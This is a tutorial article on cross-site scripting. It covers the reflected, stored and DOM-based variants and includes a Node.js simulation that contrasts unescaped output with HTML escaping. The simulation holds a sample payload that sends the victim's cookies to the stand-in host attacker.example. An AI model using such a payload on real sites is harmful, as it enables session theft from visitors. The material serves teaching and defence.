XSS Cross-Site Scripting in Web Security

Source: Internet
Author: User

This article uses XSS (Cross-Site Scripting), one of the most common web attack methods, to explain the attack principle and to propose corresponding countermeasures.

XSS

XSS stands for Cross-Site Scripting. The abbreviation XSS (rather than CSS) is used to avoid confusion with Cascading Style Sheets.

XSS is a security vulnerability that commonly occurs in web applications. It allows a malicious user to inject script into pages that are served to other users. XSS is an attack on the privacy of a web site's users: once a user's session or personal details are stolen or controlled, the consequences can be serious. Most attacks on web sites involve only two parties, the attacker and the site, or the attacker and a client victim. XSS attacks involve three parties at once: the attacker, the client, and the web site. The objective of an XSS attack is usually to steal the client's cookies, or any other sensitive information the site uses to identify the user. Holding a valid user's session token, the attacker can continue to interact with the site as that user, thereby impersonating them.

For example, XSS can be used to steal users' credit card numbers and other private information. The attacker's JavaScript executes in the victim's browser with the privileges of the vulnerable web site, because the browser treats it as the site's own script. Those privileges are limited by the same-origin policy: the script cannot read content from other origins, only data that belongs to the site. Note that although the vulnerability lies in the web site, the site itself is never directly harmed; it is the visitor who suffers. This is nevertheless enough for the script to collect the user's cookies and send them to the attacker. (Flagging the session cookie as HttpOnly keeps it out of document.cookie, but the injected script can still issue requests to the site from the victim's browser, with the cookie attached automatically.)

There are three types of XSS attacks:

1. Reflected cross-site scripting attacks

Through social engineering, the attacker sends the user a URL in which the malicious script is embedded as a request parameter. The server reflects that parameter into the page it returns, and when the user opens the page the browser executes the script embedded in it.

2. Stored cross-site scripting attacks

The attacker uses a data-entry or editing function provided by the web application (a comment form, a profile field) to save the malicious script on the server or in a user's cookie. Whenever other users browse a page that displays that data, their browsers execute the embedded script. Every viewer of the page is attacked.

3. DOM-based cross-site scripting attacks

A piece of JavaScript on the HTML page builds HTML from user-controlled input (for example, the URL fragment) and writes it into the document. The attacker places a script in that input, and it executes when the page's own code renders it.

The difference between DOM-based XSS and the two types above is that the malicious markup is produced purely by client-side script. The payload may never be sent to the server at all (a URL fragment is not part of the HTTP request), so server-side filtering cannot see it. The defense must therefore be implemented in the JavaScript itself: encode the input before inserting it, or write it with a text-only API such as textContent instead of innerHTML.

Principle


I believe you now understand the concept of XSS. The following example illustrates the attack principle. Suppose the following is a piece of PHP code on our web site:

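As an added example (this is not the article's own PHP code), the following Node.js script simulates the three variants described above: a server that echoes a search parameter (reflected), a comment list served from a store (stored), and page script that reads the URL fragment (DOM-based). No real browser or server is involved; each "page" is just the HTML string that would be emitted, so we can check whether the attacker's markup survives into executable form. All function names, the sample site name shop.example, and the payload are constructed for this example; attacker.example is a reserved, non-routable name.

```javascript
// Added example: a Node.js simulation of reflected, stored and DOM-based XSS.
// Nothing here is from the original article; names and data are constructed.

// Constructed attacker payload: sends document.cookie to a host the attacker controls.
const PAYLOAD =
  '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>';

// HTML-body output encoding: the five characters that can break out of a text
// context are replaced with entities, so the browser renders them as literal text.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Crude check used only by this demo: does the emitted HTML still contain a
// script element the browser would execute?
function containsExecutableScript(html) {
  return /<script\b/i.test(html);
}

// 1. Reflected XSS: the server echoes a query parameter straight into the page.
//    A victim who follows a crafted link gets the payload back in the response.
function renderSearchPage(query, { escape = false } = {}) {
  const q = escape ? escapeHtml(query) : query;
  return `<html><body><h1>Results for: ${q}</h1></body></html>`;
}

// 2. Stored XSS: the payload is persisted (here an in-memory "database" of
//    comments) and served to every later visitor of the page.
const commentStore = [];
function postComment(author, text) {
  commentStore.push({ author, text });
}
function renderComments({ escape = false } = {}) {
  const items = commentStore
    .map((c) => {
      const a = escape ? escapeHtml(c.author) : c.author;
      const t = escape ? escapeHtml(c.text) : c.text;
      return `<li><b>${a}</b>: ${t}</li>`;
    })
    .join('');
  return `<ul>${items}</ul>`;
}

// 3. DOM-based XSS: page script reads location.hash and writes it into the
//    document. The fragment never leaves the browser, so a server-side filter
//    cannot see it; the encoding must happen in the client-side script itself.
function requestLineSeenByServer(url) {
  const u = new URL(url);
  return `GET ${u.pathname}${u.search} HTTP/1.1`; // no fragment in the request
}
function renderGreetingFromUrl(url, { escape = false } = {}) {
  const u = new URL(url);
  // Browser equivalent: decodeURIComponent(location.hash.slice(1))
  const name = decodeURIComponent(u.hash.slice(1));
  const n = escape ? escapeHtml(name) : name; // this string goes to innerHTML
  return `<div id="greeting">Hello, ${n}</div>`;
}

// Run each variant with and without output encoding and report the outcome.
function demo() {
  const results = {};
  results.reflectedVulnerable = containsExecutableScript(renderSearchPage(PAYLOAD));
  results.reflectedFixed = containsExecutableScript(renderSearchPage(PAYLOAD, { escape: true }));

  postComment('mallory', PAYLOAD);
  results.storedVulnerable = containsExecutableScript(renderComments());
  results.storedFixed = containsExecutableScript(renderComments({ escape: true }));

  const link = 'https://shop.example/welcome#' + encodeURIComponent(PAYLOAD);
  results.serverSeesFragment = requestLineSeenByServer(link).includes('script');
  results.domVulnerable = containsExecutableScript(renderGreetingFromUrl(link));
  results.domFixed = containsExecutableScript(renderGreetingFromUrl(link, { escape: true }));
  return results;
}

console.log(demo());
```

In the DOM case, escaping before assigning to innerHTML works, but assigning the raw value to textContent is simpler and cannot be bypassed by a missed character. The escaping shown here is correct only for HTML body text; a value placed inside an attribute, a URL, or a script block needs the encoding for that context.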
  